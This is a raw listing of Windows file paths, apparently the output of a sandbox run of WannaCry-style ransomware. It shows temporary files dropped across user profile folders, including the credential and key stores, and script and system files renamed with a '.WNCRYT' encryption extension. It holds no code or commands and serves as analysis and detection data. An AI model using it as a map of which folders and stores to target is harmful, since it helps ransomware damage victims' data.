C:\Users\user\AppData\Roaming\~SD2641.tmp
C:\Users\user\AppData\Roaming\Adobe\~SD2652.tmp
C:\Users\user\AppData\Roaming\Adobe\Acrobat\~SD2653.tmp
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\~SD2654.tmp
C:\Users\user\AppData\Roaming\Adobe\Flash Player\~SD2655.tmp
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\~SD2656.tmp
C:\Users\user\AppData\Roaming\Adobe\Headlights\~SD2657.tmp
C:\Users\user\AppData\Roaming\Adobe\Linguistics\~SD2658.tmp
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\~SD2678.tmp
C:\Users\user\AppData\Roaming\com.adobe.dunamis\~SD2698.tmp
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\~SD26E8.tmp
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\~SD2746.tmp
C:\Users\user\AppData\Roaming\Identities\~SD27A5.tmp
C:\Users\user\AppData\Roaming\Identities\{62195DA6-B982-4CC2-B681-2834060304B1}\~SD2804.tmp
C:\Users\user\AppData\Roaming\Media Center Programs\~SD2834.tmp
C:\Users\user\AppData\Roaming\Microsoft\~SD2844.tmp
C:\Users\user\AppData\Roaming\Microsoft\AddIns\~SD2855.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\~SD2866.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\~SD2876.tmp
C:\Users\user\AppData\Roaming\Microsoft\Credentials\~SD2887.tmp
C:\Users\user\AppData\Roaming\Microsoft\Crypto\~SD28A7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\~SD28C7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD28E8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\~SD2908.tmp
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\~SD2909.tmp
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\~SD2929.tmp
C:\Users\user\AppData\Roaming\Microsoft\Excel\~SD2949.tmp
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\~SD2979.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\~SD29A9.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SD29BA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\~SD29EA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\~SD29FA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\~SD2A2A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\~SD2A5A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\~SD2A7A.tmp
C:\Users\user\AppData\Roaming\Microsoft\MMC\~SD2AAA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\~SD2ADA.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\~SD2B0A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Proof\~SD2B3A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Protect\~SD2B79.tmp
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD2BC8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Speech\~SD2C08.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\~SD2C38.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\~SD2C68.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\~SD2C88.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\~SD2CD7.tmp
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\~SD2CE8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\~SD2D17.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\~SD2D47.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\~SD2D96.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\~SD2DA7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\~SD2DD7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\~SD2E93.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\~SD2EA4.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\~SD2EC4.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\~SD2EE5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\~SD2EF5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\~SD2EF6.tmp
C:\Users\user\AppData\Roaming\Microsoft\UProof\~SD2EF7.tmp
C:\Users\user\AppData\Roaming\Microsoft\Vault\~SD2EF8.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\~SD2EF9.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\~SD2F0A.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low\~SD2F0B.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\~SD2F0C.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\Low\~SD2F0D.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\~SD2F0E.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\~SD2F0F.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\~SD2F10.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\~SD2F20.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\~SD2F21.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\~SD2F22.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SD2F52.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SD2F63.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\~SD2F83.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\~SD2F94.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\~SD2FA4.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\~SD2FB5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\~SD2FF5.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\~SD3044.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\~SD3093.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SD30C3.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3102.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD3132.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD3162.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3182.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD31A2.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD31C3.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\~SD31D3.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\~SD3203.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\~SD3233.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\~SD32C1.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Word\~SD331F.tmp
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\~SD3330.tmp
C:\Users\user\AppData\Roaming\Mozilla\~SD337F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Extensions\~SD33AF.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\~SD33DF.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\~SD340F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\~SD341F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\~SD3420.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\~SD3431.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD3432.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\bookmarkbackups\~SD3443.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\~SD3444.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\events\~SD3445.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\~SD3446.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\~SD3447.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\2024-08\~SD3457.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\~SD3458.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\db\~SD3459.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\events\~SD345A.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\pending_pings\~SD345B.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\tmp\~SD347C.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\minidumps\~SD348C.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\saved-telemetry-pings\~SD348D.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\security_state\~SD348E.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\sessionstore-backups\~SD348F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\settings\~SD34A0.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\~SD34A1.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\default\~SD34A2.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\~SD34A3.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\~SD34A4.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\~SD34A5.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\~SD3532.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\~SD35A1.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\~SD35D1.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\~SD3610.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\~SD3650.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\~SD369F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\temporary\~SD371D.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\~SD378B.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\failed\~SD37BB.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\toFetch\~SD37EB.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD380B.tmp
C:\Users\user\AppData\Roaming\Skype\~SD385A.tmp
C:\Users\user\AppData\Roaming\Skype\RootTools\~SD388A.tmp
C:\Users\user\AppData\Roaming\Sun\~SD38AA.tmp
C:\Users\user\AppData\Roaming\Sun\Java\~SD38BB.tmp
C:\Users\user\AppData\Roaming\Sun\Java\Deployment\~SD38DB.tmp
C:\Users\user\Contacts\~SD38EC.tmp
C:\Users\user\Desktop\~SD38ED.tmp
C:\Users\user\Documents\~SD38FE.tmp
C:\Users\user\Documents\WindowsPowerShell\~SD391E.tmp
C:\Users\user\Downloads\~SD393E.tmp
C:\Users\user\Favorites\~SD396E.tmp
C:\Users\user\Favorites\Links\~SD397F.tmp
C:\Users\user\Favorites\Links for United States\~SD39BE.tmp
C:\Users\user\Links\~SD39DE.tmp
C:\Users\user\Music\~SD3A0E.tmp
C:\Users\user\OneDrive\~SD3A2E.tmp
C:\Users\user\Pictures\~SD3A4F.tmp
C:\Users\user\Saved Games\~SD3A6F.tmp
C:\Users\user\Searches\~SD3AAE.tmp
C:\Users\user\Videos\~SD3AFE.tmp
C:\vlmcsd\~SD3B2D.tmp
C:\BOOTSECT.BAK.WNCRYT
C:\ba69bdf0a250e352360c33\header.bmp.WNCRYT
C:\ba69bdf0a250e352360c33\SplashScreen.bmp.WNCRYT
C:\ba69bdf0a250e352360c33\watermark.bmp.WNCRYT
C:\Users\All Users\Boxstarter\BoxstarterShell.ps1.WNCRYT
C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
